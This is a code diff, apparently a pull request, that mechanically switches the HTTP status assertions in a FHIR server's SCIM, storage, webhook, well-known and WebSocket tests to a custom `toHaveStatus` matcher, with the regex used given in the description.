-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const readResponse = await request(app)
       .get(`/scim/v2/Users/${res1.body.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(readResponse.status).toBe(200);
+    expect(readResponse).toHaveStatus(200);
     expect(readResponse.body.id).toBe(res1.body.id);
 
     const searchResponse = await request(app)
       .get(`/scim/v2/Users`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(searchResponse.status).toBe(200);
+    expect(searchResponse).toHaveStatus(200);
 
     const searchCheck = searchResponse.body.Resources.find((user: any) => user.id === res1.body.id);
     expect(searchCheck).toBeDefined();
@@ -98,18 +98,18 @@ describe('SCIM Routes', () => {
         ...res1.body,
         externalId: randomUUID(),
       });
-    expect(updateResponse.status).toBe(200);
+    expect(updateResponse).toHaveStatus(200);
     expect(updateResponse.body.externalId).toBeDefined();
 
     const deleteResponse = await request(app)
       .delete(`/scim/v2/Users/${res1.body.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(deleteResponse.status).toBe(204);
+    expect(deleteResponse).toHaveStatus(204);
 
     const searchResponse2 = await request(app)
       .get(`/scim/v2/Users`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(searchResponse2.status).toBe(200);
+    expect(searchResponse2).toHaveStatus(200);
 
     const searchCheck2 = searchResponse2.body.Resources.find((user: any) => user.id === res1.body.id);
     expect(searchCheck2).toBeUndefined();
@@ -129,19 +129,19 @@ describe('SCIM Routes', () => {
         },
         emails: [{ value: randomUUID() + '@example.com' }],
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
 
     const readResponse = await request(app)
       .get(`/scim/v2/Users/${res1.body.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(readResponse.status).toBe(200);
+    expect(readResponse).toHaveStatus(200);
     expect(readResponse.body.id).toBe(res1.body.id);
     expect(readResponse.body.active).toBe(true);
 
     const searchResponse = await request(app)
       .get(`/scim/v2/Users`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(searchResponse.status).toBe(200);
+    expect(searchResponse).toHaveStatus(200);
 
     const searchCheck = searchResponse.body.Resources.find((user: any) => user.id === res1.body.id);
     expect(searchCheck).toBeDefined();
@@ -161,7 +161,7 @@ describe('SCIM Routes', () => {
           },
         ],
       });
-    expect(patchResponse.status).toBe(200);
+    expect(patchResponse).toHaveStatus(200);
     expect(patchResponse.body.active).toBe(false);
   });
 
@@ -178,7 +178,7 @@ describe('SCIM Routes', () => {
         },
         emails: [{ value: randomUUID() + '@example.com' }],
       });
-    expect(res.status).toBe(201);
+    expect(res).toHaveStatus(201);
     expect(res.body.userType).toBe('Practitioner');
   });
 
@@ -211,7 +211,7 @@ describe('SCIM Routes', () => {
     const res = await request(app)
       .get(`/scim/v2/Users`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const result = res.body;
     expect(result.totalResults).toBeDefined();

--- a/packages/server/src/storage/routes.test.ts
+++ b/packages/server/src/storage/routes.test.ts
@@ -44,19 +44,19 @@ describe('Storage Routes', () => {
 
   test('Missing signature', async () => {
     const res = await request(app).get(`/storage/${binary.id}?Expires=123`);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Missing expires', async () => {
     const res = await request(app).get(`/storage/${binary.id}?Signature=xyz`);
-    expect(res.status).toBe(410);
+    expect(res).toHaveStatus(410);
   });
 
   test('Invalid signature', async () => {
     const dateLessThan = new Date();
     dateLessThan.setHours(dateLessThan.getHours() + 1);
     const res = await request(app).get(`/storage/${binary.id}?Signature=xyz&Expires=${dateLessThan.getTime()}`);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Success', async () => {
@@ -75,7 +75,7 @@ describe('Storage Routes', () => {
 
     // And finally, we can execute the request
     const res = await req;
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Binary not found', async () => {
@@ -87,7 +87,7 @@ describe('Storage Routes', () => {
       contentType: ContentType.TEXT,
     });
     const res = await req;
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('File not found', async () => {
@@ -104,7 +104,7 @@ describe('Storage Routes', () => {
     config.storageBaseUrl = req.url + 'storage/';
     req.url = await getBinaryStorage().getPresignedUrl(resource);
     const res = await req;
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Write success', async () => {
@@ -123,7 +123,7 @@ describe('Storage Routes', () => {
 
     // And finally, we can execute the request
     const res = await req.send('foo bar baz quux');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Write mismatched content type', async () => {
@@ -142,24 +142,24 @@ describe('Storage Routes', () => {
 
     // And finally, we can execute the request
     const res = await req.set('content-type', 'application/json').send('{}');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
   });
 
   test('Write missing signature', async () => {
     const res = await request(app).put(`/storage/${binary.id}?Expires=123`);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   test('Write missing expires', async () => {
     const res = await request(app).put(`/storage/${binary.id}?Signature=xyz`);
-    expect(res.status).toBe(410);
+    expect(res).toHaveStatus(410);
   });
 
   test('Write invalid signature', async () => {
     const dateLessThan = new Date();
     dateLessThan.setHours(dateLessThan.getHours() + 1);
     const res = await request(app).put(`/storage/${binary.id}?Signature=xyz&Expires=${dateLessThan.getTime()}`);
-    expect(res.status).toBe(401);
+    expect(res).toHaveStatus(401);
   });
 
   describe('Project query param', () => {
@@ -206,7 +206,7 @@ describe('Storage Routes', () => {
       config.storageBaseUrl = req.url + 'storage/';
       req.url = await getBinaryStorage().getPresignedUrl(projectBinary);
       const res = await req;
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
     });
 
     test('GET tampered Project fails signature', async () => {
@@ -215,7 +215,7 @@ describe('Storage Routes', () => {
       const url = await getBinaryStorage().getPresignedUrl(projectBinary);
       req.url = url.replace(`Project=${projectId}`, `Project=${randomUUID()}`);
       const res = await req;
-      expect(res.status).toBe(401);
+      expect(res).toHaveStatus(401);
     });
 
     test('PUT success with Project param', async () => {
@@ -223,7 +223,7 @@ describe('Storage Routes', () => {
       config.storageBaseUrl = req.url + 'storage/';
       req.url = await getBinaryStorage().getPresignedUrl(projectBinary, { upload: true });
       const res = await req.send('project upload content');
-      expect(res.status).toBe(200);
+      expect(res).toHaveStatus(200);
     });
 
     test('PUT tampered Project fails signature', async () => {
@@ -232,7 +232,7 @@ describe('Storage Routes', () => {
       const url = await getBinaryStorage().getPresignedUrl(projectBinary, { upload: true });
       req.url = url.replace(`Project=${projectId}`, `Project=${randomUUID()}`);
       const res = await req.send('tampered');
-      expect(res.status).toBe(401);
+      expect(res).toHaveStatus(401);
     });
   });
 });

--- a/packages/server/src/webhook/routes.test.ts
+++ b/packages/server/src/webhook/routes.test.ts
@@ -68,7 +68,7 @@ describe('Anonymous webhooks', () => {
         description: 'Alice bot description',
         accessPolicy: createReference(testSetup.accessPolicy),
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     expect(res1.body.resourceType).toBe('Bot');
     expect(res1.body.id).toBeDefined();
     bot = res1.body as WithId<Bot>;
@@ -81,13 +81,13 @@ describe('Anonymous webhooks', () => {
       .send({
         code: cjsCode,
       });
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
 
     // Get the bot ProjectMembership
     const res3 = await request(app)
       .get(`/fhir/R4/ProjectMembership?profile=Bot/${bot.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
     expect(res3.body.entry).toBeDefined();
     expect(res3.body.entry.length).toBe(1);
     botMembership = res3.body.entry[0].resource as WithId<ProjectMembership>;
@@ -102,7 +102,7 @@ describe('Anonymous webhooks', () => {
         description: 'Binary response bot description',
         accessPolicy: createReference(testSetup.accessPolicy),
       });
-    expect(res4.status).toBe(201);
+    expect(res4).toHaveStatus(201);
     expect(res4.body.resourceType).toBe('Bot');
     expect(res4.body.id).toBeDefined();
     binaryResponseBot = res4.body as WithId<Bot>;
@@ -115,13 +115,13 @@ describe('Anonymous webhooks', () => {
       .send({
         code: binaryResponseCode,
       });
-    expect(res5.status).toBe(200);
+    expect(res5).toHaveStatus(200);
 
     // Get the bot ProjectMembership for the binary response bot
     const res6 = await request(app)
       .get(`/fhir/R4/ProjectMembership?profile=Bot/${binaryResponseBot.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res6.status).toBe(200);
+    expect(res6).toHaveStatus(200);
     expect(res6.body.entry).toBeDefined();
     expect(res6.body.entry.length).toBe(1);
     binaryResponseBotMembership = res6.body.entry[0].resource as WithId<ProjectMembership>;
@@ -138,7 +138,7 @@ describe('Anonymous webhooks', () => {
           value: true,
         },
       ]);
-    expect(res7.status).toBe(200);
+    expect(res7).toHaveStatus(200);
 
     // Do the same for the binary response bot
     const res8 = await request(app)
@@ -152,7 +152,7 @@ describe('Anonymous webhooks', () => {
           value: true,
         },
       ]);
-    expect(res8.status).toBe(200);
+    expect(res8).toHaveStatus(200);
   });
 
   afterAll(async () => {
@@ -165,7 +165,7 @@ describe('Anonymous webhooks', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('x-signature', 'signature')
       .send('input');
-    expect(res.status).toBe(404);
+    expect(res).toHaveStatus(404);
   });
 
   test('Non-bot project membership', async () => {
@@ -174,7 +174,7 @@ describe('Anonymous webhooks', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('x-signature', 'signature')
       .send('input');
-    expect(res.status).toBe(403);
+    expect(res).toHaveStatus(403);
     expect(res.text).toStrictEqual('ProjectMembership must be for a Bot resource');
   });
 
@@ -184,7 +184,7 @@ describe('Anonymous webhooks', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('x-signature', 'signature')
       .send('input');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Success with OperationOutcome', async () => {
@@ -193,7 +193,7 @@ describe('Anonymous webhooks', () => {
       .set('Content-Type', ContentType.FHIR_JSON)
       .set('x-signature', 'signature')
       .send(allOk);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
   });
 
   test('Response contains a body', async () => {
@@ -214,7 +214,7 @@ describe('Anonymous webhooks', () => {
       .set('Content-Type', ContentType.JSON)
       .set('x-signature', 'signature')
       .send(input);
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.header['content-type']).toContain('text/xml');
     expect(res.text.trim()).toBe('<Response><Say>Hello, world!</Say></Response>');
   });
@@ -229,7 +229,7 @@ describe('Anonymous webhooks', () => {
         description: 'Alice bot description',
         accessPolicy: createReference(accessPolicy),
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     expect(res1.body.resourceType).toBe('Bot');
     expect(res1.body.id).toBeDefined();
 
@@ -238,7 +238,7 @@ describe('Anonymous webhooks', () => {
     const res2 = await request(app)
       .get(`/fhir/R4/ProjectMembership?profile=Bot/${botWithoutPublicWebhook.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.entry).toBeDefined();
     expect(res2.body.entry.length).toBe(1);
 
@@ -249,7 +249,7 @@ describe('Anonymous webhooks', () => {
       .set('Content-Type', ContentType.TEXT)
       .set('x-signature', 'signature')
       .send('input');
-    expect(res3.status).toBe(403);
+    expect(res3).toHaveStatus(403);
     expect(res3.text).toStrictEqual('Bot is not configured for public webhook access');
   });
 
@@ -262,7 +262,7 @@ describe('Anonymous webhooks', () => {
         name: 'Alice personal bot',
         description: 'Alice bot description',
       });
-    expect(res1.status).toBe(201);
+    expect(res1).toHaveStatus(201);
     expect(res1.body.resourceType).toBe('Bot');
     expect(res1.body.id).toBeDefined();
 
@@ -271,7 +271,7 @@ describe('Anonymous webhooks', () => {
     const res2 = await request(app)
       .get(`/fhir/R4/ProjectMembership?profile=Bot/${botWithoutPublicWebhook.id}`)
       .set('Authorization', 'Bearer ' + accessToken);
-    expect(res2.status).toBe(200);
+    expect(res2).toHaveStatus(200);
     expect(res2.body.entry).toBeDefined();
     expect(res2.body.entry.length).toBe(1);
 
@@ -288,14 +288,14 @@ describe('Anonymous webhooks', () => {
           value: true,
         },
       ]);
-    expect(res3.status).toBe(200);
+    expect(res3).toHaveStatus(200);
 
     const res4 = await request(app)
       .post(`/webhook/${projectMembership.id}`)
       .set('Content-Type', ContentType.TEXT)
       .set('x-signature', 'signature')
       .send('input');
-    expect(res4.status).toBe(403);
+    expect(res4).toHaveStatus(403);
     expect(res4.text).toStrictEqual('ProjectMembership must have an Access Policy');
   });
 });

--- a/packages/server/src/wellknown.test.ts
+++ b/packages/server/src/wellknown.test.ts
@@ -20,7 +20,7 @@ describe('Well Known', () => {
 
   test('Get /.well-known/jwks.json', async () => {
     const res = await request(app).get('/.well-known/jwks.json');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
 
     const keys = res.body.keys;
     expect(keys).toBeDefined();
@@ -64,7 +64,7 @@ describe('Well Known', () => {
 
   test('Get /.well-known/openid-configuration', async () => {
     const res = await request(app).get('/.well-known/openid-configuration');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.issuer).toBeDefined();
     expect(res.body.authorization_endpoint).toBeDefined();
     expect(res.body.token_endpoint).toBeDefined();
@@ -77,7 +77,7 @@ describe('Well Known', () => {
 
   test('Get /.well-known/oauth-authorization-server', async () => {
     const res = await request(app).get('/.well-known/oauth-authorization-server');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.issuer).toBeDefined();
     expect(res.body.authorization_endpoint).toBeDefined();
     expect(res.body.token_endpoint).toBeDefined();
@@ -90,7 +90,7 @@ describe('Well Known', () => {
 
   test('Get /.well-known/oauth-protected-resource', async () => {
     const res = await request(app).get('/.well-known/oauth-protected-resource');
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resource).toBeDefined();
     expect(res.body.issuer).toBeDefined();
     expect(res.body.authorization_servers).toBeDefined();
@@ -103,19 +103,19 @@ describe('Well Known', () => {
     const res = await request(app).get(
       '/.well-known/oauth-protected-resource?resource=http://localhost:8103/fhir/R4/Patient/123'
     );
-    expect(res.status).toBe(200);
+    expect(res).toHaveStatus(200);
     expect(res.body.resource).toBe('http://localhost:8103/fhir/R4/Patient/123');
   });
 
   test('Protected resource with invalid resource', async () => {
     const res = await request(app).get('/.well-known/oauth-protected-resource?resource=https://example.com/invalid');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Invalid resource URL');
   });
 
   test('Protected resource with resource array', async () => {
     const res = await request(app).get('/.well-known/oauth-protected-resource?resource=a&resource=b&resource=c');
-    expect(res.status).toBe(400);
+    expect(res).toHaveStatus(400);
     expect(res.text).toBe('Invalid resource URL');
   });
 });

--- a/packages/server/src/ws/agent.test.ts
+++ b/packages/server/src/ws/agent.test.ts
@@ -321,7 +321,7 @@ describe('Agent WebSockets', () => {
               'NK1|1|JONES^BARBARA^K|SPO|||||20011105\r' +
               'PV1|1|I|2000^2012^01||||004777^LEBAUER^SIDNEY^J.|||SUR||-||1|A0-',
           });
-        expect(res.status).toBe(200);
+        expect(res).toHaveStatus(200);
         expect(res.headers['content-type']).toBe('application/fhir+json; charset=utf-8');
         expect(res.body).toMatchObject(allOk);
       })
@@ -359,7 +359,7 @@ describe('Agent WebSockets', () => {
               'NK1|1|JONES^BARBARA^K|SPO|||||20011105\r' +
               'PV1|1|I|2000^2012^01||||004777^LEBAUER^SIDNEY^J.|||SUR||-||1|A0-',
           });
-        expect(res.status).toBe(400);
+        expect(res).toHaveStatus(400);
         expect(res.body.issue[0].details.text).toBe('Timeout');
       })
       .close()
@@ -415,7 +415,7 @@ describe('Agent WebSockets', () => {
       .exec((ws) => ws.send(pushResponse))
       .exec(async () => {
         const res = await pushRequest;
-        expect(res.status).toBe(200);
+        expect(res).toHaveStatus(200);
         expect(res.headers['content-type']).toBe('x-application/hl7-v2+er7; charset=utf-8');
         expect(res.text).toMatch(/MSH.*ACK.*\r/);
       })
@@ -592,7 +592,7 @@ describe('Agent WebSockets', () => {
       .exec((ws) => ws.send(pushResponse))
       .exec(async () => {
         const res = await pushRequest;
-        expect(res.status).toBe(200);
+        expect(res).toHaveStatus(200);
         expect(res.headers['content-type']).toBe('x-application/ping; charset=utf-8');
       })
       .close()

--- a/packages/server/src/ws/fhircast.test.ts
+++ b/packages/server/src/ws/fhircast.test.ts
@@ -99,7 +99,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               });
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
           })
           .expectJson((obj) => {
@@ -242,7 +242,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               });
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
 
             // Update report 2 -- add observation
@@ -303,7 +303,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               } satisfies FhircastMessagePayload<'DiagnosticReport-update'>);
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
           })
           .expectJson((obj: FhircastMessagePayload<'DiagnosticReport-update'>) => {
@@ -358,7 +358,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               } satisfies FhircastMessagePayload<'DiagnosticReport-update'>);
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
           })
           .expectJson((obj: FhircastMessagePayload<'DiagnosticReport-update'>) => {
@@ -413,7 +413,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               } satisfies FhircastMessagePayload<'DiagnosticReport-update'>);
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
           })
           .expectJson((obj: FhircastMessagePayload<'DiagnosticReport-update'>) => {
@@ -430,7 +430,7 @@ describe('FHIRcast WebSocket', () => {
               .get(`/fhircast/STU3/${topic}`)
               .set('Authorization', 'Bearer ' + accessToken);
 
-            expect(res2.status).toEqual(200);
+            expect(res2).toHaveStatus(200);
           })
           // TODO: Check context
           .exec(async () => {
@@ -475,7 +475,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               } satisfies FhircastMessagePayload<'DiagnosticReport-update'>);
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
           })
           .expectJson((obj: FhircastMessagePayload<'DiagnosticReport-update'>) => {
@@ -530,7 +530,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               } satisfies FhircastMessagePayload<'DiagnosticReport-update'>);
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.body).toBeDefined();
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
           })
@@ -587,7 +587,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               } satisfies FhircastMessagePayload<'DiagnosticReport-update'>);
-            expect(res2.status).toBe(400);
+            expect(res2).toHaveStatus(400);
             expect(res2.body).toMatchObject(
               badRequest('Cannot delete a resource that is part of the original open context')
             );
@@ -634,7 +634,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               } satisfies FhircastMessagePayload<'DiagnosticReport-update'>);
-            expect(res3.status).toBe(400);
+            expect(res3).toHaveStatus(400);
             expect(res3.body).toMatchObject(badRequest('Cannot delete resource not currently in the content bundle'));
             expect(res2.headers['content-type']).toBe('application/fhir+json; charset=utf-8');
           })
@@ -662,7 +662,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               });
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
           })
           .expectJson((obj: FhircastMessagePayload<'DiagnosticReport-open'>) => {
@@ -697,7 +697,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               });
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
 
             // Close report 1 -- make sure empty context
@@ -735,7 +735,7 @@ describe('FHIRcast WebSocket', () => {
                   ],
                 },
               });
-            expect(res2.status).toBe(202);
+            expect(res2).toHaveStatus(202);
             expect(res2.headers['content-type']).toBe('application/json; charset=utf-8');
           })
           .expectJson((obj: FhircastMessagePayload<'DiagnosticReport-open'>) => {
@@ -751,7 +751,7 @@ describe('FHIRcast WebSocket', () => {
               .get(`/fhircast/STU3/${topic}`)
               .set('Authorization', 'Bearer ' + accessToken);
 
-            expect(res2.status).toEqual(200);
+            expect(res2).toHaveStatus(200);
             expect(res2.body).toMatchObject({ context: [], 'context.type': '' });
           })
           .close()


### PR DESCRIPTION
Follow-up to #9873 

```
s/\.status\)\.to[a-zA-Z]+\((\d)/).toHaveStatus($1/g
```